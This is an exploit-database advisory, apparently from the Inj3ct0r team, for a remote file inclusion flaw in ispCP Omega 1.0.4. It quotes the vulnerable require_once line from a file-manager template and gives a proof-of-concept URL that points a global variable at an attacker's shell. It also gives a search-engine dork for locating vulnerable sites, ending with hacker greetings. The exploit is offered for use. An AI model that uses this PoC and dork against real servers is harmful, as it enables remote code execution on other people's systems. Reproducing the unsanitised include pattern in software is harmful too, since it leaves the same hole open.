Text :  

[+] ispCP Omega <= 1.0.4 Remote File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' __ /'__` / __ /'__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /' _ ` / /_/__<_ /'___ / /`'__ 0
0 / / / / __/ _ _ / 1
1 _ _ __ ____/ ____\ __\ ____/ _ 0
0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
1 ____/ >> Exploit database separated by exploit
0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 I'm cr4wl3r member from Inj3ct0r Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: cr4wl3r
[+] Download: http://isp-control.net/
[+] Dork: "Powered by ispCP Omega"
[+] Code in
[ispcp-omega-1.0.4/gui/tools/filemanager/skins/mobile/admin1.template.php]

[x] <?php
require_once($net2ftp_globals["application_skinsdir"] .
"/blue/admin1.template.php"); ?>

[+] PoC:
[path]/tools/filemanager/skins/mobile/admin1.template.php?net2ftp_globals[a
pplication_skinsdir]=[Shell]

[+] Greetz and thanks to:
[!] str0ke [milw0rm.com]
[!] r0073r, 0x1D [inj3ct0r.com]
[!] opt!x hacker [morrocan hacker]
[!] xoron [turkish hacker]
[!] irvian, cyberlog, [sekuritionline.net]
[!] EA ngel, basix, angky_tatoki, doniskaynet, panteto [manadocoding.net]
[!] boom3rang [khg-cr3w.org]

  References :  

None